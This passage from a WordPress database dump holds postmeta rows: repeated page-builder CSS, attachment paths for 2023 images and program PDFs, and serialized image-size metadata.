0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}.vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}.vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}.vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(35542,5162,'_wpb_shortcodes_custom_css_updated','1'),
(35543,5163,'_wpb_shortcodes_custom_css','.vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873543921{margin-bottom: 10px !important;}.vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}.vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}.vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}.vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(35544,5163,'_wpb_shortcodes_custom_css_updated','1'),
(35545,5164,'_wpb_shortcodes_custom_css','.vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873543921{margin-bottom: 10px !important;}.vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}.vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}.vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}.vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(35546,5164,'_wpb_shortcodes_custom_css_updated','1'),
(35547,5165,'_wpb_shortcodes_custom_css','.vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873543921{margin-bottom: 10px !important;}.vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}.vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}.vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}.vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(35548,5165,'_wpb_shortcodes_custom_css_updated','1'),
(35549,5166,'_wpb_shortcodes_custom_css','.vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873543921{margin-bottom: 10px !important;}.vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}.vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}.vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}.vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(35550,5166,'_wpb_shortcodes_custom_css_updated','1'),
(35551,5167,'_wp_attached_file','2023/08/main_u6.jpg'),
(35552,5167,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:375;s:4:\"file\";s:19:\"2023/08/main_u6.jpg\";s:8:\"filesize\";i:365766;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"main_u6-300x75.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6731;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"main_u6-1024x256.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45912;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"main_u6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6131;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"main_u6-768x192.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29344;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:19:\"main_u6-500x125.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15377;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:19:\"main_u6-800x200.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31381;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:20:\"main_u6-1280x320.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64402;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(35553,5168,'_wp_attached_file','2023/08/main_u6-1.jpg'),
(35554,5168,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:375;s:4:\"file\";s:21:\"2023/08/main_u6-1.jpg\";s:8:\"filesize\";i:365766;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"main_u6-1-300x75.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6731;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"main_u6-1-1024x256.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45912;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"main_u6-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6131;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"main_u6-1-768x192.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29344;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:21:\"main_u6-1-500x125.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15377;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:21:\"main_u6-1-800x200.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31381;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:22:\"main_u6-1-1280x320.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64402;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(35555,5169,'_wp_attached_file','2023/08/main_u6-2.jpg'),
(35556,5169,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:375;s:4:\"file\";s:21:\"2023/08/main_u6-2.jpg\";s:8:\"filesize\";i:365766;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"main_u6-2-300x75.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6731;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"main_u6-2-1024x256.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45912;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"main_u6-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6131;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"main_u6-2-768x192.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29344;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:21:\"main_u6-2-500x125.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15377;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:21:\"main_u6-2-800x200.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31381;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:22:\"main_u6-2-1280x320.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64402;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(35563,5174,'_wp_attached_file','2023/08/GSW2023-Program.pdf'),
(35564,5174,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:1815451;}'),
(35569,5177,'_wp_attached_file','2023/08/GSW2023-Program-2023-08-13.pdf.pdf'),
(35570,5177,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:1815451;}'),
(35571,5178,'_wp_attached_file','2023/08/GSW2023-Program-2023-08-13.pdf'),
(35572,5178,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:1815451;}'),
(35604,5193,'_wp_attached_file','2023/08/d2.jpg'),
(35605,5193,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:554;s:6:\"height\";i:554;s:4:\"file\";s:14:\"2023/08/d2.jpg\";s:8:\"filesize\";i:45882;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:14:\"d2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20530;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"d2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6126;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:14:\"d2-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49513;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(35606,5194,'_wp_attached_file','2023/08/d1.jpg'),
(35607,5194,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:859;s:4:\"file\";s:14:\"2023/08/d1.jpg\";s:8:\"filesize\";i:241797;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:14:\"d1-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15581;}s:5:\"large\";a:5:{s:4:\"file\";s:15:\"d1-1024x687.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:687;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:151262;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"d1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7807;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:14:\"d1-768x515.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:515;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89289;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:14:\"d1-500x336.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:336;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39381;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:14:\"d1-800x537.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96752;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(35608,5195,'_wp_attached_file','2023/08/d2-1.jpg'),
(35609,5195,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:554;s:6:\"height\";i:554;s:4:\"file\";s:16:\"2023/08/d2-1.jpg\";s:8:\"filesize\";i:45882;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"d2-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20530;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"d2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6126;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:16:\"d2-1-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49513;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(35610,5196,'_wp_attached_file','2023/08/d1-1.jpg'),
